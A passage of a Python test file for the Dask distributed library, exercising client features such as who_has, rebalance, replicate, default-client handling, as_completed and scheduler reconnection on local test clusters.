d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True, nthreads=[])
async def test_worker_aliases(c, s):
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await asyncio.gather(a.close(), b.close(), w.close())
def test_persist_get_sync(c):
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
with pytest.raises(Exception, match="hello world"):
await x
# Make rebalance() work predictably on small amounts of managed memory. By default it
# uses optimistic memory, which could only be tested by allocating amounts of managed
# memory large enough to hide variations in unmanaged memory.
REBALANCE_MANAGED_CONFIG = {
"distributed.worker.memory.rebalance.measure": "managed",
"distributed.worker.memory.rebalance.sender-min": 0,
"distributed.worker.memory.rebalance.sender-recipient-gap": 0,
}
@gen_cluster(client=True, config=REBALANCE_MANAGED_CONFIG)
async def test_rebalance(c, s, a, b):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
futures = await c.scatter(range(100), workers=[a.address])
assert len(a.data) == 100
assert len(b.data) == 0
await c.rebalance()
assert len(a.data) == 50
assert len(b.data) == 50
@gen_cluster(nthreads=[("", 1)] * 3, client=True, config=REBALANCE_MANAGED_CONFIG)
async def test_rebalance_workers_and_keys(client, s, a, b, c):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
futures = await client.scatter(range(100), workers=[a.address])
assert (len(a.data), len(b.data), len(c.data)) == (100, 0, 0)
# Passing empty iterables is not the same as omitting the arguments
await client.rebalance([])
await client.rebalance(workers=[])
assert (len(a.data), len(b.data), len(c.data)) == (100, 0, 0)
# Limit rebalancing to two arbitrary keys and two arbitrary workers.
await client.rebalance([futures[3], futures[7]], [a.address, b.address])
assert (len(a.data), len(b.data), len(c.data)) == (98, 2, 0)
with pytest.raises(KeyError):
await client.rebalance(workers=["notexist"])
def test_rebalance_sync():
with dask.config.set(REBALANCE_MANAGED_CONFIG):
with Client(n_workers=2, processes=False, dashboard_address=":0") as c:
s = c.cluster.scheduler
a = c.cluster.workers[0]
b = c.cluster.workers[1]
futures = c.scatter(range(100), workers=[a.address])
assert len(a.data) == 100
assert len(b.data) == 0
c.rebalance()
assert len(a.data) == 50
assert len(b.data) == 50
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
"""Client.rebalance() internally waits for unfinished futures"""
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
# Let the futures reach the scheduler
await asyncio.sleep(0.1)
# We didn't wait enough for futures to complete. However, Client.rebalance() will
# block until all futures are completed before invoking Scheduler.rebalance().
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_on_explicit_missing_data(c, s, a, b):
"""rebalance() raises KeyError if explicitly listed futures disappear"""
f = Future("x", client=c, state="memory")
with pytest.raises(KeyError, match="Could not rebalance keys:"):
await c.rebalance(futures=[f])
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
while x.status != "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
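# Helper that counts pickle round-trips: each serialize/deserialize cycle
# increments n, letting test_replicate_tree_branching observe how many hops
# a replicated value went through.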
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
while any(v for w in s.workers.values() for v in w.processing):
await asyncio.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster(client=True)
async def test_ensure_default_client(c, s, a, b):
assert c is default_client()
async with Client(s.address, set_as_default=False, asynchronous=True) as c2:
assert c is default_client()
assert c2 is not default_client()
ensure_default_client(c2)
assert c is not default_client()
assert c2 is default_client()
def test_ensure_default_get_deprecated():
with pytest.warns(FutureWarning, match="`ensure_default_get` is deprecated"):
from distributed.client import ensure_default_get
assert ensure_default_get is ensure_default_client
@gen_cluster()
async def test_set_as_default(s, a, b):
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=False, asynchronous=True) as c1:
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=True, asynchronous=True) as c2:
assert default_client() is c2
async with Client(s.address, set_as_default=True, asynchronous=True) as c3:
assert default_client() is c3
async with Client(
s.address, set_as_default=False, asynchronous=True
) as c4:
assert default_client() is c3
await c4.scheduler_comm.close()
while c4.status != "running":
await asyncio.sleep(0.01)
assert default_client() is c3
with pytest.raises(ValueError):
default_client()
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
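# Exercise the scheduler introspection RPCs (ncores, has_what, nbytes, who_has)
# and check that they agree with the scheduler's internal bookkeeping.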
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
with pytest.raises(KilledWorker) as info:
await f
text = logger.getvalue()
assert f.key in text
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True, timeout=60)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await c.restart(timeout="0.5s")
text = logger.getvalue()
assert "Restart timed out after 0.50 seconds" in text
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_cluster(nthreads=[])
async def test_status(s):
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
@gen_cluster(client=True)
async def test_async_whowhat(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
who_has = await c.who_has()
has_what = await c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
assert who_has == {x.key: (a.address,)}
assert has_what == {a.address: (x.key,), b.address: ()}
def test_sync_whowhat(c):
x = c.submit(inc, 1)
who_has = c.who_has()
has_what = c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
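# Kill and restart the scheduler on a fixed port: the client should notice the
# outage, cancel outstanding futures, and reconnect once the scheduler is back.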
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli):
c = Client("127.0.0.1:9393", loop=loop)
c.wait_for_workers(1, timeout=10)
x = c.submit(inc, 1)
assert x.result(timeout=10) == 2
start = time()
while c.status != "connecting":
assert time() < start + 10
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result(timeout=10)
with popen(scheduler_cli):
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 10
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 10
x = c.submit(inc, 1)
assert x.result(timeout=10) == 2
start = time()
while True:
assert time() < start + 10
try:
x.result(timeout=10)
assert False
except CommClosedError:
continue
except CancelledError:
break
sync(loop, w.close, timeout=1)
c.close()
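# Helper used below: temporarily install an asyncio exception handler that records
# any unhandled exception raised inside the block and re-raises it as
# UnhandledException when the context manager exits.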
class UnhandledException(Exception):
pass
@contextmanager
def catch_unhandled_exceptions() -> Generator[None, None, None]:
loop = asyncio.get_running_loop()
ctx: dict[str, Any] | None = None
old_handler = loop.get_exception_handler()
@loop.set_exception_handler
def _(loop: object, context: dict[str, Any]) -> None:
nonlocal ctx
ctx = context
try:
yield
finally:
loop.set_exception_handler(old_handler)
if ctx:
raise UnhandledException(ctx["message"]) from ctx.get("exception")
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with catch_unhandled_exceptions(), captured_logger(
logging.getLogger("distributed.client")
) as logger:
await s.close()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == Status.closed
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
if time() > start + 10:
if worker == Worker: # this is an esoteric case
print("File descriptors did not clean up")
break
else:
raise ValueError("File descriptors did not clean up")
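# Submitting the same deterministic task (same key) from a second client should be
# idempotent: the scheduler's transition log must not record it a second time.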
@gen_cluster()
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
assert isinstance(info["started"], float)
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions_sync(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for worker_versions in v["workers"].values():
assert worker_versions is not None
c.get_versions(check=True)
# smoke test that get_versions does not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_get_versions_async(c, s, a, b):
v = await c.get_versions(check=True)
assert v.keys() == {"scheduler", "client", "workers"}
@gen_cluster(client=True, config={"distributed.comm.timeouts.connect": "200ms"})
async def test_get_versions_rpc_error(c, s, a, b):
a.stop()
v = await c.get_versions()
assert v.keys() == {"scheduler", "client", "workers"}
assert v["workers"].keys() == {b.address}
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
